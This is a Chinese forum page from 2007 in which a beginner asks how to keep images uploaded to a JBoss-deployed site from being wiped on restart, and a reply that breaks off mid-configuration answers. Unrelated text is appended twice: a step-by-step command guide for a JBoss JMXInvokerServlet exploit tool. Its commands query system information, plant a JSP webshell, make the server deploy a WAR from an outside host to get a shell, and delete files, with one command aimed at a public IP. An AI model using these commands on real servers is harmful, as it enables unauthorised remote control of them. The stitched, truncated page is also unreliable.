jboss部署上传文件问题

tom0932 2007-05-31 01:39:28
小弟用EJB开发网站,开发环境是Jbuilder+Jboss,我用将Jbuider打包后生成的.ear文件拷贝到jboss\server\default\deploy下,服务能够正常运行。但网站有上传图片功能,本来我想把图片存到网站根目录下的images目录下,但当服务启动后上传的图片都存到临时jboss目录的文件夹下去了,重启了服务器那些上传的图片又都被清空了,导致服务器重启不能图片显示不出来。。请问有没有什么办法可以把启动服务后上传的图片存到网站根目录下的images目录下?也就是我的.ear文件里面的images目录下。或者有没有办法可以让存在临时目录的文件在重启服务器后不会被清空?或者如果不用直接拷贝.ear文件的方式部署,应该怎么部署?小弟是新手,希望高手教教我,谢谢!
...全文
490 2 打赏 收藏 转发到动态 举报
写回复
用AI写文章
2 条回复
切换为时间正序
请发表友善的回复…
发表回复
tom0932 2007-06-01
  • 打赏
  • 举报
回复
谢谢楼兄,问题已解决。。但怎么给分呢?
luckliang 2007-05-31
  • 打赏
  • 举报
回复
在jboss中要配置一个虚拟的影射路径去保存你上传的文件,这个虚拟路径的写法网上有很多种。修改几个xml文件就好了。

解决方案一:把打包的程序解压在 :\jboss4\server\default\deploy目录下,然后把上穿文件路径指到jsp所放的路径一般是webapps下。重起jboss 服务器就可以了

解决方案二:安全起见在其他盘建立目录,在jboss自带的tomcat目录里找到server.xml文件在< host></host>之间加上<Context path="/up" docBase="f:\up" debug="1" reloadable="true" override="true" crossContext="true" defaultWebXml="web.xm
某大牛写的jboss-exp 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp

67,512

社区成员

发帖
与我相关
我的任务
社区描述
J2EE只是Java企业应用。我们需要一个跨J2SE/WEB/EJB的微容器,保护我们的业务核心组件(中间件),以延续它的生命力,而不是依赖J2SE/J2EE版本。
社区管理员
  • Java EE
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧